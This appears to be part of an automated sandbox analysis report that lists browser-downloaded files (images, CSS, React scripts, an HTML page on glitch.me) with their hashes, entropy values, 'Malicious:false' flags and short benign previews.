                                                                                                                                                                                                            SHA-512:BB23963B3FB38F3A976D7324785BF957CA6BE322B4070B047E40B6FA612219A8D34F3100B67BCD505E8D87260E2BBBDE5F9BC41EDD1307FC747C8E84F5EF1780
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/images/homepage-banners/modern_home.jpg
                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:B60FE747488D11EEA83687A2E59320CC" xmpMM:InstanceID="xmp.iid:B60FE746488D11EEA83687A2E59320CC" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:10052fcd-6563-4e0b-8b24-de1c12001c08" stRef:documentID="adobe:docid:photoshop:1b873438-bb99-024a-8e97-98777a8fb36f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.625
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:UU:UU
                                                                                                                                                                                                            MD5:DD9B395C741CE2784096E26619E14910
                                                                                                                                                                                                            SHA1:D691792F378240F80919BEDA895262C509D22B75
                                                                                                                                                                                                            SHA-256:C084B47104C493FB377B6D35D8C08DF67D773F6DCF8294C0A7360710CD8CACBD
                                                                                                                                                                                                            SHA-512:BB9D8EFF819A61A9CE8BDF03336D6E0650DC5F0339843CAD9C8B96C404CA751FB797BECD4D9A1FD24AFD9D6F3FA9B86645E6E8AD8B855C032E80A4F8897B983C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:window.$CQ=_g.$;
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):137787
                                                                                                                                                                                                            Entropy (8bit):7.979539421935738
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:RkWKWJvD0r3NbIN/HiQe4gOW5qFEwKwoZmxLfENvk:RkQ4DYPiQe4PW5SEzHNvk
                                                                                                                                                                                                            MD5:1449892EFC0C94786478F6609C28125D
                                                                                                                                                                                                            SHA1:543F955354ACC99ACE29D1A25F66FC27236B4282
                                                                                                                                                                                                            SHA-256:E13BC940E002D0452E884BA843690457B75D2CC0F9FEFD66F99F0E7093A528D7
                                                                                                                                                                                                            SHA-512:452E7E2C619377774BD603437DCA84B58EC80B1A2B2978AA3169A996E9749B537E7038A0BADAF728D53D61612D5B285189A253E37002462CBD87F27153BBFCDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/images/homepage-banners/staff_background_wheat.jpg
                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:D3DA53FA53BD11EFB156A9DD8535B747" xmpMM:InstanceID="xmp.iid:D3DA53F953BD11EFB156A9DD8535B747" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69d761ac-ac6e-4ecd-ae24-eb8e472e5d5c" stRef:documentID="adobe:docid:photoshop:6ec06c4c-7df8-ea4c-828b-fc5ea02d2e14"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (56744)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1379538
                                                                                                                                                                                                            Entropy (8bit):6.021213258443914
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:m51DmAh/+YxhV1shU+hqyFGk06Ne5G+pQHD7XfIepn3EyLueml+:m5cEedJgTSHfPVulo
                                                                                                                                                                                                            MD5:834F48DCD027B791FC4978A00F1DD91E
                                                                                                                                                                                                            SHA1:E31571D71AEA186AB3FDDF5868A45C7F70EAFD3D
                                                                                                                                                                                                            SHA-256:965A7F3934C984C733D8D95F55F3265116391098A3F565A9F4BCA90A62DAFCDF
                                                                                                                                                                                                            SHA-512:5371B52C189F677846679428690E2EF6858B9F9BD22CFC95D6A70F30428149AF9C64363BA3E5EF19AA2B7F35A2B5E7787890EEE0C3017F14D3F3E48C7B641681
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title id="pageTittle"></title>. <link id="faviconPage" rel="shortcut icon" href="" type="image/x-icon">. <style>. * {. box-sizing: border-box;. margin: 0;. padding: 0;. }. body {. font-family: Arial, Helvetica, sans-serif;. width: 100%;. background-color: rgb(255, 255, 255);. overflow: hidden;. }. a {. text-decoration: none;. }. header {. display: flex;. align-items: center;. justify-content: space-between;. padding: 10px;. background: rgb(8, 90, 182);. }. img#logod {. width: 6%;. }. .flexlogo {. display: flex;. align-items: center;. gap: 1.3rem;. }. .profileLogo
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 32 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):817
                                                                                                                                                                                                            Entropy (8bit):7.602031146587345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:N/61fBUkouE4pvW0D0g6WS3Qv3YMhoyD8x7RQS:N/6FBKgec0g63kNW
                                                                                                                                                                                                            MD5:CE273BDD7D5C78613311F31B1BC77870
                                                                                                                                                                                                            SHA1:CCAD030EC9060D5EB3CBACB77968A9ACAD13C5C9
                                                                                                                                                                                                            SHA-256:0D220766B429A80F4858F1A115F79D746D7A3D873FFBE11233E4A822C5759982
                                                                                                                                                                                                            SHA-512:011B8ABA918ED0807D82A7B98177E2F1190A2426339B5458A68DDB1E6A424CA16BABB1D22204C670FBEC7C9F1FA064AD37A8CFDB80C370FA3AC01CA13334E831
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/Livestock.png
                                                                                                                                                                                                            Preview:.PNG........IHDR... ................pHYs.................sRGB.........gAMA......a.....IDATx..VKR.@....B.O.*.&..N.>A..!'.. .....'.....,..!$U.|6...t[Ra.d.`'...x..o..g......`..'...... No...c.$.D..=S.vk..|3%....BH^.....=."......r..M..r9.-.!..#{..mB8....+..\..M8.|.x...1$$S|.e...E{.@w........DL..f..`7....Yw.._.<........Z.h.3..-... ...s.Q..v....... ..:.-}...3f.V`..n.wD. .0.P.....C.=4..tC#..Q.....n..Z$).wQ.|}........$l...e...#^]..C.-p....G....6K..m)......E%....c..{..t.m.\...=m.H:sc;)%.Y.0.wBd.....x..z.....".\/}.]p.5u ..BhH.(..2...@;....jt_.aw!.!.aX....T>.-.tk.}.q.5.o......V..|....[h.B....!...Aj...7'......p...iw/.+...R.g86.D6TD.U....F?.:2..H.U" ...P.]X..s....8..P...L.pb...2..P...uGOtu'.r7du.2.V.2.L..D... ..Pa2...6A.Z.`..@..}....CT.JS.\Tx..z.....\..Tr.....>.xP...ANi._.'....IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (474)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):109931
                                                                                                                                                                                                            Entropy (8bit):4.717833542014338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:VmjA0bi0UH0uMP5Mmhm6/mFah0nNRva1LMf4fU353ohNjN70dYq4G/ekVxQm4G0Q:YjDizH0Sah0nNR8Vs4G/BxMBQ
                                                                                                                                                                                                            MD5:05C3E7E7BA74B97802B32C6781212A24
                                                                                                                                                                                                            SHA1:90D578388B9EBFC83895B9533A9D15B8E537E108
                                                                                                                                                                                                            SHA-256:28348FEF6CB0ED8B2CEEB22DEAF824428FD13875D84C73D38F77DD216FC24E7F
                                                                                                                                                                                                            SHA-512:60523A0A168F439847F68F10E27E59CC31EB86BC19DDD860652436242FE982662E0F442D1B48B04207C56B527EA388EF925B0A06EA5C1F3E53C75CAA6B6E4515
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://unpkg.com/react@18.3.1/umd/react.development.js
                                                                                                                                                                                                            Preview:/**. * @license React. * react.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = global || self, factory(global.React = {}));.}(this, (function (exports) { 'use strict';.. var ReactVersion = '18.3.1';.. // ATTENTION. // When adding new symbols to this file,. // Please consider also adding to 'react-devtools-shared/src/backend/ReactSymbols'. // The Symbol used to tag the ReactElement-like types.. var REACT_ELEMENT_TYPE = Symbol.for('react.element');. var REACT_PORTAL_TYPE = Symbol.for('react.portal');. var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment');. var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode');. var RE
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1352)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1080227
                                                                                                                                                                                                            Entropy (8bit):4.683413687755208
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:Eb4LcitesQOUrfhl597ZRt4f/t7EQWRWqPwiQ3YaA4gSX:Eb4LcitesQOUrfhH97ZR2FEQWRWqPwi0
                                                                                                                                                                                                            MD5:3EDF0EB850CBD3326D48DD88B6C3029F
                                                                                                                                                                                                            SHA1:AB3BD02C5322C693EBE6E824BA87141E57A3A18A
                                                                                                                                                                                                            SHA-256:F9044A5E9C39DB8BB1A204DFF924E526EC0A621E695BB69DE1035811BE8709E4
                                                                                                                                                                                                            SHA-512:51D09A415EF8CA0E2DFCFCB6EBBE0B8A4253A0103474C0623DC89CB23BD626815C832EE63589453DFD585FA876B06E17BE16AA785A30FDB32C329ED9E2152048
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://unpkg.com/react-dom@18.3.1/umd/react-dom.development.js
                                                                                                                                                                                                            Preview:/**. * @license React. * react-dom.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('react')) :. typeof define === 'function' && define.amd ? define(['exports', 'react'], factory) :. (global = global || self, factory(global.ReactDOM = {}, global.React));.}(this, (function (exports, React) { 'use strict';.. var ReactSharedInternals = React.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED;.. var suppressWarning = false;. function setSuppressWarning(newSuppressWarning) {. {. suppressWarning = newSuppressWarning;. }. } // In DEV, calls to console.warn and console.error get replaced. // by calls to these methods by a Babel plugin.. //. // In PROD (or in packages without access to React internals),.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                            Entropy (8bit):5.063242643759072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:tRBRNqFFKN+pKcvdqH5MHq7SLvDmJS4RKb58ZSFuHRZGt2RfWKOA9hEk5v:tnrw9BwH5MKumc4slvIRw0fWq9hEkx
                                                                                                                                                                                                            MD5:33F2D67875BAABF1C9564DAAB7E7A021
                                                                                                                                                                                                            SHA1:DCB83D55059B2CEA91AC8F45001BCDBD98D9D136
                                                                                                                                                                                                            SHA-256:24EB609FA2CE5EF0172BC4569ACF6B34BC2FC32C73617E794F63CCB66982C450
                                                                                                                                                                                                            SHA-512:9F3C1F0A4E4815D66516EDB4FD287AA93C832F709A055F408C6E528D5AAC8106A6B420715485D67E9544454A16139AD57C8AEB6209F5C3CB47209D7DF271E879
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svg
                                                                                                                                                                                                            Preview:<svg width="8" height="5" viewBox="0 0 8 5" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M1 4.53613L4 1.53613L7 4.53613" stroke="#D21E24"/>.</svg>.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):555
                                                                                                                                                                                                            Entropy (8bit):7.377837241745018
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/7j/6Ts/CL0GLt/VSoxHaeDzxLNHGOmCvH1mF2aJVhmunTU:u/6z0GL9VSoxHN3xLNHGOzvHsFLqwTU
                                                                                                                                                                                                            MD5:109D055C7F1557CEE036E5BCF7E16030
                                                                                                                                                                                                            SHA1:2137ED0ED2E8A90FB2E0CC1458C278CD540EBEFD
                                                                                                                                                                                                            SHA-256:2E75CD7584C5561BD6CFBFF760686A093CABF74A4D8A73DC49A91C19F89D0E81
                                                                                                                                                                                                            SHA-512:65B8C35792174766DC2C6B956C0B45011E7717D17CA2E1CEDA3B2BB071B934884E58B6F024E7B095AAF8BC8E6BBA25A2417F3591062C4E9A2CD8C309B9E0C430
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR..............l;....pHYs.................sRGB.........gAMA......a.....IDATx..T1V.@..Y...Y./>..r...z.<.z...z...z...........`...q..6.H,...f....AH..N.H.8......!..2.z..b...+...S."... .Ea......i]'."..m.c...Y.....V8P.N.n.6.hds'.XD"...f..&q{.3.]..Z..l..2./.._...F,Yl...x,>.....Q..3....E.Ig..3..3\ Mw.n..-W.D...-.E....7..0....#..PovOkv.|e..6..=?...f..Qq2w,.....uo.(..!.M...v.<4..%V8$.=-.=...\B..)Pw=...'4.....(..je^..0I>xs.iWl..s..X6~.j..d...*....l...|...K..@.sH..u5.... j...=.<M......;ljID..l=-.....C,..........IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (63861)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2638418
                                                                                                                                                                                                            Entropy (8bit):5.580519911741236
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:FRVXHGkpWGzBXRO3ReCbiwQ/D3hVx2SpQB80qEcPKEhVkuO6OxBmvU9ru8Xlh:Fb33983ZVxf
                                                                                                                                                                                                            MD5:2D7DF618EB528A2CE626641AACCEA776
                                                                                                                                                                                                            SHA1:2C031AA894E13DD488BCBA5A09AB4D54D41C9B8D
                                                                                                                                                                                                            SHA-256:95641DABE7575DC36270DB7D559CB68AA25A90E95E674C9390293FCE0CC98F53
                                                                                                                                                                                                            SHA-512:1310F32965731946FBFA3DC4748660B1640BB257B1950BAAF1F35E0F201DDD1A5EF158A9D34EBCFDB89AC457EE00EDEA0BB3C7930900E36BD5EBF12D8FAFE8A1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js
                                                                                                                                                                                                            Preview:!function(e){function t(t){for(var n,u,i=t[0],c=t[1],a=t[2],p=0,s=[];p<i.length;p++)u=i[p],Object.prototype.hasOwnProperty.call(o,u)&&o[u]&&s.push(o[u][0]),o[u]=0;for(n in c)Object.prototype.hasOwnProperty.call(c,n)&&(e[n]=c[n]);for(f&&f(t);s.length;)s.shift()();return l.push.apply(l,a||[]),r()}function r(){for(var e,t=0;t<l.length;t++){for(var r=l[t],n=!0,i=1;i<r.length;i++){var c=r[i];0!==o[c]&&(n=!1)}n&&(l.splice(t--,1),e=u(u.s=r[0]))}return e}var n={},o={1:0},l=[];function u(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,u),r.l=!0,r.exports}u.m=e,u.c=n,u.d=function(e,t,r){u.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},u.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},u.t=function(e,t){if(1&t&&(e=u(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var r=Object.create(nul
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                            SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                            SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                            SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:{}
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2407
                                                                                                                                                                                                            Entropy (8bit):4.120800107455978
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:n/vg2rGKrPgxrL3XAeUKTkIw90vtRZpJmWkuFFB5i7AF2:ng2rGTrs9bB9qRqQ5wAF2
                                                                                                                                                                                                            MD5:81A61FA6DF91240A8C0DA8CFA1F205B7
                                                                                                                                                                                                            SHA1:4DDC78DF7F4C442C36A48ED13DE319CCD33EBCE2
                                                                                                                                                                                                            SHA-256:1DCBAB25EF09241FAABB74D0A891609A992CF8A4A51D4715FD8909EF490FB27B
                                                                                                                                                                                                            SHA-512:A4F8C7C6794CFE39004924E7A67B22044608818B2E28B7C5150748F0CB77F615279587616E9C2B8F343D256EB641A6EE4F68ADC9E447AEE99BA04763F1C6A993
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg
                                                                                                                                                                                                            Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7.05268 17.8536 7.14645C17.9473 7.24021 18 7.36739 18 7.5V16.5C18 16.6326 17.9473 16.7598 17.8536 16.8536C17.7598 16.9473 17.6326 17 17.5 17H9.5C9.36739 17 9.24021 16.9473 9.14645 16.8536C9.05268 16.7598 9 16.6326 9 16.5V14.5C9 14.3674 8.94732 14.2402 8.85355 14.1464C8.75979 14.0527 8.63261 14 8.5 14C8.36739 14 8.24021 14.0527 8.14645 14.1464C8.05268 14.2402 8 14.3674 8 14.5V16.5C8 16.8978 8.15804 17.2794 8.43934 17.5607C8.72064 17.842 9.10218 18 9.5 18H17.5C17.8978 18 18.2794 17.842 18.5607 17.5607C18.842 17.2794 19 16.8978 19 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 152 x 66, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2918
                                                                                                                                                                                                            Entropy (8bit):7.907716853116308
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:g/6on79OskwFLow7j3R2/wsq90BcZzPnwbD5R4ilCJHd3zXS0dtd+jzOcLnd:gSLstFEwn0/xqqBctobQiUHd3zXSg+jn
                                                                                                                                                                                                            MD5:AED2CCE0BEA27C8E648B826838FF36DB
                                                                                                                                                                                                            SHA1:2D7713543D84113EBEA24D61653224560A9DF1E2
                                                                                                                                                                                                            SHA-256:748181DAB74B0ED8BA83CE218F97B0F1B325C2C61560C5CB8AE76EE26DEAC339
                                                                                                                                                                                                            SHA-512:A4D2E71883E22331A7B3C5EC4883C6E311D63854F2A11A5CA76667F9C51DC826F9A48F2834D2ABB5C4FE5181A7807319B474EDD1ED34C35D2DEDA3154FA715B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/logos/Red_logo.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.......B......g.h....pHYs.................sRGB.........gAMA......a.....IDATx..m.\....l.mR.}i.H.Mw.".._4.....-..F.*..*XP..-...b.Ei...]!.E.4.C.......|qcPL..fU..l.a...9.;...2..nv..fgg.......s....|..zy..<..C|...B.p..fA.#...<.X,...>..J%........u_..;V....h..L0!W.<}t.ww./.....@.~..j......H..vJ......~...u..'.`..l.....'o.Q..Y`..........uO.._98d....j.Xl......?...r..&...#...r.#.C.p.s...`.....!W|O].hjY....T.w.8..f.f5..Jnk.....$j.$T..6....,z......x.$.w....C.1..v...u7..;n.$S..ld....o.~_r...Z..YC0......H.p.c....b......B.Sj.z.0.......E.eI;U...7....%...PW?......C...y.R.x|....*.......T....O?...~ j..;.Vs.3F.4..pG.M.UW..hm...=K$....'...P..(.';.....|...Z....W...K.E.......\..t....?"*....M2.. l.F.......Q...k......5..\.doO7.a..Q.B.Mfl.EK.g.....\E......~0..z`#..)r}.gn.F.......y.....Xr.....N..U+..O....dG9..k.R..3....Y..fR...@..0..M.o^..!.h8...........&...!W..&....ym....75..p#....^...r..wT.........%yLy.s..k.\6r..E......j....c.0~!I.5H.;,...o~gL.m...D.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):431389
                                                                                                                                                                                                            Entropy (8bit):5.015652507780826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9m+gKHljgvNsEBpSZc3EJZhhnLnpje63IllFxSBtMlCpje60I4Fp0EN+vvn3XsH6:9m+zdnpje63IllFoBtMlCpje60I4Fpjs
                                                                                                                                                                                                            MD5:B12902665E7F329D47D0E56B8A41E8E6
                                                                                                                                                                                                            SHA1:355D902E04D8DAC15364D02B7DCB057004F74289
                                                                                                                                                                                                            SHA-256:B16C49D822D115D5A91DD2D48F19C46A0F3F5EEFF24050EA15062D6213F3B3D1
                                                                                                                                                                                                            SHA-512:8E416C3D971B5B6FC645A49427AFE8D1FE87D1B12E750030D0B1361EFE67E6D58C089E0B41134AA9E9965B408AB82A52D11493BB35300202995ECF9954C5A4F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                                                                                            Preview::root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg,hsla(0,0%,100%,.15),hsla(0,0%,100%,0))}*,:after,:before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}.youir-active{border-bottom:2px solid blue}body{-webkit-text-size-adjust:100%;-webkit-tap-highlig
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1468
                                                                                                                                                                                                            Entropy (8bit):5.804481977980605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:2jkm94/zKPccAaflSi+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6Qp:VKEcgBKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                            MD5:D5136C3BA35BD4951DD2E05D1C0D6410
                                                                                                                                                                                                            SHA1:5C0A14736FA0A45B3633DFBE1C8EFF923A9D8FF3
                                                                                                                                                                                                            SHA-256:C054EDA69ECD98E551B37886DF259580DF42AB54C0E39C3EAA04F76AB8917E12
                                                                                                                                                                                                            SHA-512:6D542EDD4AB29E6A2D145296C762D52C00095E90AAFC4EA72B33B984D0C96F1914BFE33694683F9B64762A6484DF701D6F303E8CF681668C3E0B7BFFFAE00C97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://www.google.com/recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF
